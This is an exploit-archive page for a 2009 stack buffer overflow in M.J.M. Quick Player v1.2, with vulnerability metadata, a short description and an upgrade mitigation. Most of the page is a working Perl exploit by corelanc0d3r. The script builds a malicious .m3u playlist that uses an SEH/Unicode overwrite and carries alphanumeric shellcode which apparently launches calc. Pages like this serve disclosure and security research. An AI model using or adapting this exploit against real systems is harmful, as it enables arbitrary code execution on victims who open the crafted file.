header-logo
Suggest Exploit
vendor:
Quick Player
by:
mr_me, corelanc0d3r
9.3
CVSS
HIGH
local and remote code execution
119
CWE
Product Name: Quick Player
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:mjm_software:quick_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

M.J.M. Quick Player v1.2 Stack BOF

A buffer overflow vulnerability exists in M.J.M. Quick Player v1.2. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This can potentially allow the attacker to take control of the affected system. The vulnerability is due to a boundary error when handling specially crafted .m3u files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .m3u file with the vulnerable application. This can be done by sending the file as an email attachment or by hosting the file on a malicious website.

Mitigation:

Upgrade to the latest version of M.J.M. Quick Player.
Source

Exploit-DB raw data:

# [*] Vulnerability     : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by     : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : dec 28th, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : M.J.M. Quick Player
# [*] Versions affected : 1.2  (Latest version is not vulnerable)
# [*] Download from     : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH / Unicode
# [*] Tested on         : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to      : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d";  #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";  
my $morestuff="D" x 111;
# I think this will execute calc :-)
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0QU48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";